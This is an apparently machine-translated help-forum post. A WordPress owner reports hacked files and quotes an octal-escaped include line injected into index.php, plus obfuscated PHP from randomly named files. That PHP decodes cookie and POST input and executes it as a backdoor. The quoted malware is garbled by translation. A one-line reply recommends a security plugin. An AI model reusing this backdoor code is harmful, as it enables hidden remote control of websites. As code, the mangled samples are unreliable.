WordPress站点中随机更改的受影响php文件

一个月前，我在一个共享服务器上的受保护站点中发现了上传/修改的文件。例如,

/ * A * f839 /

154c / 154m / \ 167p- \ 151nc \ 154ud \ 145s / \ 157i \ 163ta \ 156bu \ 154.c \ 157m / \ 167p- \ 151nc \ 154ud \ 145t \ 151 Up \ 147es \ 057.3 \ 066e0 \ 14381 \ 071. the \ 143o ";

/ * A * f839 /

此定义位于index.php和wp-admin.php的第一行。但是，这是通过更改文件而不是编辑来完成的。我从提交之日起就理解了这一点。index.php文件每天更新一个2017年准备的文件，尽管2018年系统尚未打开

WordPress目录中还有与此问题相关的随机.php文件名，例如asdf.php，这些文件名不断变化，无法跟踪。在这些文件的内容中

<? Php
$ ltmwf [25]. $ ltmwf [25]. $ ltmwf [25]. $ ltmwf [28]. $ ltmwf [11]. $ lmwf [ . $ ltmwf [5]. $ ltmwf [6]. $ ltmwf [6]. $ ltmwf [5]. $ ltmwf [2]. $ ltmwf [28]. $ ltmwf [28]. $ ltmwf [31]. $ ltmwf [34]. $ ltmwf [2]. $ ltmwf [5]. $ ltmwf [28]. $ ltmwf [34]. $ ltmwf [12]. $ ltmwf [2]. $ ltmwf [20]. $ ltmwf [ 0]. $ ltmwf [0]. $ ltmwf [26]. $ ltmwf [2]. $ ltmwf [31]. $ ltmwf [24]. $ ltmwf [28]. $ ltmwf [35]. $ ltmwf [11] $ ltmwf [25]. $ ltmwf [28]. $ ltmwf [15]. $ ltmwf [0]. $ ltmwf [ [18]. $ Ltmwf [19]; ​​$ daitkgq [] = $ ltmwf [9]; $ daitkgq [] = $ ltmwf [11]. $ ltmwf [3]. $ ltmwf [23]. $ ltmwf [23]. $ ltmwf [23]. $ ltmwf [ 4]. $ Ltmwf [6]. $ Ltmwf [6]. $ Ltmwf [7]. $ Ltmwf [7]. $ ltmwf [21]. $ ltmwf [21]. $ ltmwf [21]. $ ltmwf [21]. $ ltmwf [ $ Ltmwf [3]. $ Ltmwf [3]; $ ltmwf [16]. $ Ltmwf [3]. $ ltmwf [8]. $ ltmwf [6]. $ ltmwf [3]. $ ltmwf [17]. $ ltmwf [6]; $ ltmwf [23]. $ ltmwf [23]. $ ltmwf [3]. $ ltmwf [7]. ($ daitkgq [7] ($ _ COOKIE, $ _POST) as $ vayacmf => $ pauaf) {function $ umdraw ($ daitkgq, $] $ ltmwf [ vayacmf, $ ujniwap) {return $ daitkgq [6] ($ daitkgq [4] ($ vayacmf. $ daitkgq [9] ($ ($ daitkgq [8] ($ vayacmf)) + 1, 0, $ ujniwap) ($ iawmjas [1], $ iawmjas); $ function {$ iawmjas} $ {$ iawmjas} $ {$ iawmjas} $ daitkgq [5] ($ daitkgq [2], $ pauaf ^ umdraw ($ daitkgq, $ daitkgq, $ daitkgq, $ daitkgq, $ daitkgq, $ daitkgq [2])); , $ vayacmf, $ daitkgq [8] ($ paaf)));

---

我想你的网站被黑了。请安装wordfence安全插件并清理：